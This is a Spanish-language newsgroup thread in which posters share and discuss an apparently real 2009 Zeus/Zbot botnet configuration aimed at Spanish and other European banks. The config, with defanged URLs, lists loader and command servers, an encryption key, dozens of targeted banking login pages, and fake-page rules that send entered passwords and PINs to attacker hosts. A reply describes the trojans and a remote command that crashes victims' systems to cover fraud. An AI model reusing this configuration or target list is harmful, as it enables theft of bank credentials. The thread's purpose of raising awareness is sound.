¿Cuanto dinero nos cuesta (recuperación de perdidas por medio del cobro
de comisiones bancarias) la existencia de esta red de salteadores, la
mayoría operando desde países occidentales?
Build time: 12:59:16 22 09 2009 GMT
Version: 1 2 8 1
entry "StaticConfig"
botnet "main"
timer_config 40 60
timer_logs 20 60
timer_stats 10 15
url_config "hxxp: lingobest info usse akelus psd"
url_compip "hxxp: prismonet com 11 22 22 11 ipcheck php" 20
encryption_key "2CuQ2rsZcf4"
blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "hxxp: djkksdjfkkldjslkdfj com usse cgi_plugin exe"
url_server "hxxp: djkksdjfkkldjslkdfj com usse rss_feed php"
file_webinjects "webinjects txt"
entry "AdvancedConfigs"
"hxxp: inversiontrace ru indexlog23 vrt"
"hxxp: djkksdjfkkldjslkdfj com indexlog23 vrt"
"hxxp: dkles2jc cn indexlog23 vrt"
end
entry "WebFilters"
"@hxxps: acikdeniz denizbank com CustomLogin Retail aspx"
"@hxxps: www sparkasse at casserver login*"
"@hxxps: internetsube akbank com tr cgi-bin login_initial cgi?
ch=BIS*"
"@hxxps: *ipko pl*"
"@hxxps: servicash cajaextremadura es BEWeb 2099 3099
inicio_identificacion action"
"@hxxps: itaubankline itau com br GRIPNET bklcom dll"
"@hxxps: www bbva es DFAUTH slod DFServlet*"
"@hxxps: net24 montepio pt*"
"@hxxps: www cajamar es *"
"@hxxps: ww3 deutsche-bank es pbct *"
"@hxxps: enlinea cajasur es BEWeb 2024 4024
inicio_identificacion action*"
"@hxxps: seguro cam es camd SvlLoginCAM*"
"@hxxps: www barclays es publico contents *"
"@hxxps: cajaelectronica caja-granada es BEWeb 2031
2031 inicio_identificacion action*"
"@hxxps: www cajalaboral com home acceso asp"
"@hxxps: caixasabadell net banca2 tx0001 0001 jsp*"
"@hxxps: caionline cai es banca1 tx0001 0001 jsp*"
"@hxxps: www fibancmediolanum es *"
"@hxxps: www1 ibercajadirecto com *"
"@hxxps: caixadirecta cgd pt CaixaDirecta loginStart
do"
"@hxxps: www1 ibercajadirecto com*"
"@hxxps: www ceca es *"
"@hxxps: pccaja lacajadecanarias es banca4 tx0001
0001 jsp*"
"@hxxps: securenetbanking ca IBRetail *
"@hxxps: www sabadellatlantico com *"
"@hxxps: www bancoherrero com*"
"@hxxps: www solbank com*"
"@hxxps: banesnet banesto es*"
"@hxxps: oi cajamadrid es CajaMadrid *"
"@hxxps: activa24 ccm es BEWeb 2105 *"
"@hxxps: www unicaja es PortalServlet*"
"@hxxps: enova caixanova es BEWeb 2080 2080
inicio_identificacion action*"
"@hxxps: corporate bpn pt corporatebanking v10 PT
aspx empresas *"
"@hxxps: oficina24hores caixagirona es BEWeb*"
"@hxxps: www cajadeavila es cgi-bin *"
"@hxxps: be clavenet net BEWeb *"
"@hxxps: caonline credito-agricola pt *"
"@hxxps: zonasegura financiero com pe newhomebanking
Default Login aspx"
"@hxxps: vitalnet cajavital es BEWeb 2097 2097
inicio_identificacion action*"
"@hxxps: linea sanostra es BEWeb 2051 2051
login_identificacion action*"
"@hxxps: www cajabadajoz es cgi-bin INclient_6010*"
"@hxxps: ebanking millenniumbank gr eBankingWeb
Controller"
"@hxxps: ebanking eurobank gr eai EAIUserLoginWeb
login jsp*"
"@hxxps: www bancobest pt ptg start swe*"
"@hxxps: bes-sec bes pt wclientes axb tpl asp"
"@hxxps: www be grupobanif pt xsite_be BE home
Autenticacao jsp"
"@hxxps: www mbnet pt servlet *"
"@hxxps: telemarch bancamarch es htmlVersion *"
"@hxxps: portal bbk es servlet Satellite*"
"@hxxps: caionline cai es banca1 tx0001
TecladoVirtual jsp*"
"@hxxps: www empresas santandertoxxa pt
canalempresas finance login jsp*"
"@hxxps: www ebgempresa es niloinet login jsp*"
"@hxxps: www caixacatalunya es NASApp ceconline
flow jsp"
"@hxxps: www be grupobanif pt xsite_be BE home
Autenticacao jsp"
"@hxxps: factor2 inetbank net au factor2sc2 *"
"@hxxps: carnet cajarioja es banca3 tx0001
TecladoVirtual jsp*"
"@hxxps: ibbweb tecmarket it tmibbwebsecurity 05608
otherauth defaultPP aspx"
"@hxxps: zonasegura financiero com pe newhomebanking
Default Login aspx"
"@hxxps: caixagestionempresas caixagalicia es BEWeb
2091 *"
"@hxxps: rob raiffeisen it nibank MAIN*"
"@hxxps: www snsbank nl secure login scripts
LoginUsingDigipass asp*"
"@hxxps: www blbanking it imprpri wbOnetoone nvt
do banking WsTransfersActionManagerInsert do*"
"@hxxps: www bpmbanking it imprpri wbOnetoone nvt
do banking WsTransfersActionManagerInsert do*"
"@hxxps: banking ing-diba at*"
"@hxxps: banking raiffeisen at html servlet *"
"@hxxps: www pekaobiznes24 pl*"
"@hxxps: oie cajamadridempresas es CajaMadrid oie
pt_oie Login *"
"@hxxps: lacajaencasa cajacanarias es BEWeb 2065
3065 inicio_identificacion_portal action*"
"@hxxps: www caixaontinyent es cgi-bin
INclient_2045*"
"@hxxps: banking ing-diba de webkunden checkLogin
do*"
"@hxxps: bank1 netbanking ch cyberibis login
secondstep init jspa*"
"@hxxps: www bgnetplus es niloinet login jsp*"
"@hxxps: www mitnykredit dk ibank *"
"@hxxps: www caixatarragona es esp sec_1
oficinacodigo jsp*"
"@hxxps: www caixaontinyent es cgi-bin
INclient_2045*"
"@*portal bbk es*"
"@hxxps: telematic caixamanlleu es ISMC Manlleu_cat acceso jsp*"
end
entry "WebDataFilters"
"hxxps: *cajaespana net*" "notredirect"
"*caja-granada es*" "notredirect"
"hxxps: *barclays es*" "notredirect"
"hxxps: seguro cam es camd SvlLoginCAM*" "notredirect"
"hxxp*: *lacaixa es*" "notredirect"
"hxxps: *cajamar es*" "notredirect"
"hxxps: *caixacatalunya es*" "notredirect"
"*cajalaboral*" "notredirect"
"*bancae caixapenedes com*" "notredirect"
"hxxps: *deutsche-bank es*" "notredirect"
"hxxps: *uno-e com*" "notredirect"
"hxxps: *sanostra es *" "notredirect"
"hxxps: *sabadellatlantico com *" "notredirect"
"hxxps: *bvi bancodevalencia es *" "notredirect"
"hxxps: *bbvanetlatam com*" "notredirect"
"hxxps: *cajacirculo es *" "notredirect"
"hxxps: *bankpymenet com *" "notredirect"
"hxxps: *cajamurcia es *" "notredirect"
"hxxps: *cajasegovia es *" "notredirect"
"hxxps: *cajasur es*" "notredirect"
"hxxps: *ccm es*" "notredirect"
"hxxps: pccaja lacajadecanarias es *" "notredirect"
"hxxps: *bancocaixageral es *" "notredirect"
"hxxps: *iurisbank com isum Main*" "notredirect"
"hxxps: *bancoherrero com *" "notredirect"
"hxxps: *solbank com *" "notredirect"
"hxxps: *bancopastor es *" "notredirect"
"hxxps: *cajaduero es *" "notredirect"
"hxxps: *caixalaietana es*" "notredirect"
"hxxps: *cajastur es*" "notredirect"
"hxxps: *telematic caixamanlleu es*" "notredirect"
"hxxps: *ruralvia com isum Main*" "notredirect"
entry "WebFakes"
"hxxps: portal bbk es servlet jsp internet login realizarLogin
jsp" "hxxp: kpacotka info im bbk php" "P" "*notredirect=*"
"*password=*"
"hxxps: *cajaespana net*" "hxxp: kpacotka info im cjes php" "P"
"*notredirect=*" "*e_IdentificacionOB1_password=*"
"* caja-granada es*" "hxxp: kpacotka info im cjgranada php" "P"
"*notredirect=*" "*PIN=*"
"hxxps: *barclays es*" "hxxp: kpacotka info im bk php" "P"
"*notredirect=*" "*COORD_USER_VALUE=*"
"hxxps: * cajacirculo es *" "hxxp: kpacotka info im cajacirculo
php" "P" "*notredirect=*" "*sPassword=*"
"hxxps: * bankpymenet com *" "hxxp: kpacotka info im bankpymenet
php" "P" "*notredirect=*" "*password=*"
"hxxps: * cajamurcia es *" "hxxp: kpacotka info im cajamurcia
php" "P" "*notredirect=*" "*AUXPIN=*"
"hxxps: * cajasegovia es *" "hxxp: kpacotka info im cajasegovia
php" "P" "*notredirect=*" "*txtClave=*"
"hxxps: * bankinter com*" "hxxp: kpacotka info im bi php" "P" "*"
"*bkcache=*"
"hxxps: * bbva es*" "hxxp: kpacotka info im bb php" "P" "*"
"*eai_password=*"
"hxxps: *cajasur es*" "hxxp: kpacotka info im cajasur php" "P"
"*notredirect=*" "*PAN=*"
"hxxps: seguro cam es camd SvlLoginCAM*" "hxxp: kpacotka info
im cam php" "P" "*notredirect=*" "*userid=*"
"hxxps: *ccm es*" "hxxp: kpacotka info im ccm php" "P"
"*notredirect=*" "*PAN=*"
"hxxps: pccaja lacajadecanarias es *" "hxxp: kpacotka info im
lacan php" "P" "*notredirect=*" "*enviado=*idioma=*"
"hxxp*: *lacaixa es*" "hxxp: kpacotka info im lc php" "P"
"*notredirect=*" "*D=*"
"hxxps: *cajamar es*" "hxxp: kpacotka info im cj php" "P"
"*notredirect=*" "*NUME=*"
"hxxps: *caixacatalunya es*" "hxxp: kpacotka info im cat php" "P"
"*notredirect=*" "*PASSWORD=*"
"hxxps: *bancocaixageral es *" "hxxp: kpacotka info im
bancocaixageral php" "P" "*notredirect=*" "*ACCESS_CODE=*"
"hxxps: *iurisbank com isum Main*" "hxxp: kpacotka info im
iurisbank php" "P" "*notredirect=*" "*USUARIO=*"
"hxxps: *bancoherrero com *" "hxxp: kpacotka info im
bancoherrero php" "P" "*notredirect=*" "*pin=*"
"hxxps: *solbank com *" "hxxp: kpacotka info im solbank php" "P"
"*notredirect=*" "*ASEA00=*"
"hxxps: *bancopastor es *" "hxxp: kpacotka info im pstr php" "P"
"*notredirect=*" "*usrID=*"
"hxxps: *cajaduero es *" "hxxp: kpacotka info im cajaduero php"
"P" "*notredirect=*" "*pin=*"
"hxxps: *caixalaietana es*" "hxxp: kpacotka info im caixalaietana
php" "P" "*notredirect=*" "*PIN=*"
"hxxps: * cajastur es*" "hxxp: kpacotka info im cajastur php" "P"
"*notredirect=*" "*PIN=*"
"* cajalaboral *" "hxxp: kpacotka info im cajalaboral php" "P"
"*notredirect=*" "*password=*"
"* bbvanetoffice com*" "hxxp: kpacotka info im bbvanetoffice php"
"P" "*" "*eai_password=*"
"* bbvanetcash com*" "hxxp: kpacotka info im bbvanetcash php" "P"
"*" "*password=*"
"*bancae caixapenedes com*" "hxxp: kpacotka info im cxped php" "P"
"*notredirect=*" "*pass=*"
"hxxps: * deutsche-bank es*" "hxxp: kpacotka info im db php" "P"
"*notredirect=*" "*userNif raw=*"
"hxxps: *uno-e com*" "hxxp: kpacotka info im uno php" "P"
"*notredirect=*" "*eai_password=*"
"hxxps: *bvi bancodevalencia es *" "hxxp: kpacotka info im val
php" "P" "*notredirect=*" "*j_password=*"
"hxxps: * sanostra es *" "hxxp: kpacotka info im san php" "P"
"*notredirect=*" "*PIN=*"
"hxxps: * sabadellatlantico com *" "hxxp: kpacotka info im
sabadell php" "P" "*notredirect=*" "*pin=*"
"hxxps: * ruralvia com isum Main*" "hxxp: kpacotka info im rur
php" "P" "*notredirect=*" "*USUARIO=*"
"hxxps: *telematic caixamanlleu es*" "hxxp: kpacotka info im
caixamanlleu php" "P" "*notredirect=*" "*sPassword=*"
"hxxps: * bbvanetlatam com*" "hxxp: kpacotka info im bbvanetlatam
php" "P" "*notredirect=*" "*eai_password=*"
entry "dnsmap"
Best regards
c.b.
http://www.abuse.ch/wp-content/zeus_kill_os_command1.jpg
Es el comando remoto (kos) para inutilizar el SO con un bonito pantallazo
azul
Se utiliza una vez conseguidos los objetivos, para tener tiempo y ejecutar
las acciones ilegales en los bancos,
incluso para borrar rastros.
Los troyanos son InfoStealer, Zeus/Zbot y Nethell/Ambler
saludos
noSign
"c.b." <simequier...@despammed.com> escribi� en el mensaje
news:hdgi6p$fum$1...@news.eternal-september.org...
> Un "antiguo archivo de configuraci�n de un botnet, preparado para el
> asalto a entidades espa�olas (entre otras).
>
> �Cuanto dinero nos cuesta (recuperaci�n de perdidas por medio del cobro
> de comisiones bancarias) la existencia de esta red de salteadores, la
> mayor�a operando desde pa�ses occidentales?